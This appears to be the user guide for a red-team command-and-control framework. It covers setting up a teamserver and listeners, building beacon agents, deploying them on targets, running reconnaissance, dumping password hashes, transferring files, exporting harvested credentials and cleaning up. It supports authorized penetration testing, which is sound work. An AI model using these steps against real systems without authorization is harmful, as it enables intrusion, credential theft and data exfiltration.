Engagement Workflow

Phase 1: Setup

#

Start the Teamserver

#

1

tantoc2-server

On first launch, the teamserver prints the default admin password to stdout. Save it — it is not displayed again.

Connect and Log In

#

1
2
3
4

tantoc2> connect http://localhost:8443
tantoc2> login admin
Password: ********
Logged in as admin

Web UI: Navigate to http://localhost:8443 and log in with the admin credentials.

Create an Engagement

#

An engagement is the project container for all objects (agents, listeners, builds, credentials).

1
2
3
4
5
6

tantoc2> engagements create client-pentest
Engagement passphrase: ****
Created engagement: client-pentest

tantoc2> engagements use client-pentest
Switched to engagement client-pentest

The prompt changes to tantoc2[client-p]> (first 8 characters of the engagement name).

Web UI: Go to Engagements > Create. Enter a name and passphrase. Click the engagement to activate it.

Add Team Members (admin only)

#

Create operator accounts and grant access to the engagement:

1
2
3
4
5
6
7
8

tantoc2[client-p]> operators create alice --role operator
Password for new operator: ****

tantoc2[client-p]> operators create bob --role collector
Password for new operator: ****

tantoc2[client-p]> operators grant alice client-pentest
tantoc2[client-p]> operators grant bob client-pentest

Web UI: Admin page > Create Operator. Then click the engagement > Grant Access.

Phase 2: Infrastructure

#

Create a Listener

#

A listener accepts callbacks from deployed agents. Create it before building agents.

1
2
3
4
5
6
7

tantoc2[client-p]> listeners create http --name main-http --port 8080
Listener created: <id> (main-http)

tantoc2[client-p]> listeners start main-http
Listener main-http started.

tantoc2[client-p]> listeners list

Web UI: Listeners page > Create Listener. Fill in transport type, name, and port. Click Start.

External redirector: If agents will call back to a redirector, not the teamserver directly:

1
2
3
4
5

tantoc2[client-p]> listeners create external \
    --name redir-443 \
    --host redirector.client.example.com \
    --port 443 \
    --protocol https

Build an Agent

#

1
2
3
4
5
6

tantoc2[client-p]> agents generate dev_agent \
    --listener main-http \
    --kill-date 2026-06-30 \
    --interval 60 \
    --jitter 20 \
    --name initial-beacon

Web UI: Builds page > Create Build. Select package, listener, kill date, and beacon parameters.

Check the build was created:

1

tantoc2[client-p]> agents builds

Download the binary:

1

tantoc2[client-p]> agents builds download initial-beacon --output /tmp/beacon.bin

Web UI: Builds page > click the download icon next to the build.

Phase 3: Access

#

Deploy the Agent on the Target

#

Transfer the binary to the target by your preferred method, then execute it:

1
2

# On the target host (example — dev agent):
./beacon.bin

The agent connects to the listener, performs ECDH key exchange with the teamserver, and registers.

Verify Check-In

#

1

tantoc2[client-p]> agents list

The agent appears with status active. Display name is hostname:shortid, e.g. WORKSTATION-01:a1b2c3d4.

Web UI: Agents page updates in real time via WebSocket — no refresh needed.

Session Mode Agents

#

For interactive use, TCP-transport agents can run in session mode (persistent connection, ~0.5s response time):

1

./agent.bin --mode session

Session agents appear with mode session in the agents list.

Phase 4: Operations

#

Enter an Agent Shell

#

1
2

tantoc2[client-p]> agents use WORKSTATION-01
WORKSTATION-01:a1b2c3d4>

From the agent shell, commands are submitted as tasks and results are delivered inline.

Basic Reconnaissance

#

1
2
3
4
5

WORKSTATION-01:a1b2c3d4> whoami
WORKSTATION-01:a1b2c3d4> survey
WORKSTATION-01:a1b2c3d4> ls C:\Users
WORKSTATION-01:a1b2c3d4> ps
WORKSTATION-01:a1b2c3d4> netstat

Results arrive as soon as the agent checks in. Session agents respond in ~0.5 seconds. Beacon agents respond after the next beacon interval.

Background Tasks

#

Append & to run a task without waiting:

1
2
3
4
5

WORKSTATION-01:a1b2c3d4> survey &
[bg:1] survey (task abc12345...)

WORKSTATION-01:a1b2c3d4> tasks        # list background tasks
WORKSTATION-01:a1b2c3d4> results 1    # retrieve result for bg task #1

Press Ctrl+C during a blocking wait to move the current task to background.

Multi-Task Execution

#

Use ;; to submit multiple tasks at once and wait for all results:

1

WORKSTATION-01:a1b2c3d4> whoami ;; hostname ;; ps

Load a Module

#

1
2
3

WORKSTATION-01:a1b2c3d4> modules list         # show compatible modules
WORKSTATION-01:a1b2c3d4> load hashdump py     # load module in managed mode
WORKSTATION-01:a1b2c3d4> loaded               # confirm it loaded

Run the loaded module:

1

WORKSTATION-01:a1b2c3d4> hashdump

Adjust Beacon Interval

#

1

WORKSTATION-01:a1b2c3d4> beacon_config {"interval": 30, "jitter": 10}

File Transfers

#

Upload to agent:

1

WORKSTATION-01:a1b2c3d4> upload /tmp/tool.exe C:\Windows\Temp\tool.exe

Download from agent:

1

WORKSTATION-01:a1b2c3d4> download C:\Users\alice\Documents\report.docx

Downloaded files are queued on the teamserver. Retrieve them from the global prompt:

1
2

tantoc2[client-p]> files list WORKSTATION-01
tantoc2[client-p]> files fetch WORKSTATION-01 <transfer-id> /tmp/report.docx

Web UI: Agent Detail page > Files tab, or the File Explorer page for a tree view.

Return to Global Shell

#

1
2

WORKSTATION-01:a1b2c3d4> back
tantoc2[client-p]>

Phase 5: Credential Collection

#

Manually Add Credentials

#

1
2
3
4
5
6

tantoc2[client-p]> creds add \
    --type plaintext \
    --username alice \
    --secret P@ssw0rd! \
    --domain CORP \
    --notes "Found in config.xml"

Search Credentials

#

1
2

tantoc2[client-p]> creds search --domain CORP
tantoc2[client-p]> creds search --type hash

Export Credentials

#

1
2
3

tantoc2[client-p]> creds export --format json
tantoc2[client-p]> creds export --format csv
tantoc2[client-p]> creds export --format hashcat   # NT hashes only

Phase 6: Collection Workflow

#

When operators collect files from agents, the file is stored on the teamserver and a collection request is created. An admin or operator must approve the request before the file content can be retrieved.

See Roles and Collection for the full workflow.

Phase 7: Cleanup

#

Kill agents gracefully (sends a kill command, agent terminates on next check-in):

1

tantoc2[client-p]> agents kill WORKSTATION-01

Stop listeners:

1

tantoc2[client-p]> listeners stop main-http

Remove files and tools from target hosts using whatever means you used for initial access.

Archive the Engagement

#

Archive the engagement data to a portable encrypted file:

1
2
3
4

curl -X POST https://localhost:8443/api/v1/engagements/<id>/archive \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"passphrase": "your-passphrase", "output_path": "/secure/backup/client-pentest.archive"}'

Web UI: Engagements page > click the archive icon > enter passphrase.

Tips

#

• Kill dates are your safety net. Always set a kill date even for short engagements. Agents with no kill date will keep running if you forget to clean them up.
• Name your builds. Use --name when generating agents — it makes the builds table readable and download filenames descriptive.
• Use session mode for interactive work. Beacon agents at 60s intervals make interactive operations painful. Use session agents or drop the interval to 5s for active phases.
• Multi-operator: select your engagement first. All operators must have the engagement activated (engagements use) before their commands affect the right data.
• Listener bound to 0.0.0.0? Specify the external IP when building agents: --listener main-http:10.0.0.1.

Related Pages

#

• Agent Management — modules, P2P relays, lifecycle
• Tools (Agentless Operations) — SSH and other direct-protocol tools
• Roles and Collection — RBAC and collection request workflow
• Credential Management — full credential store reference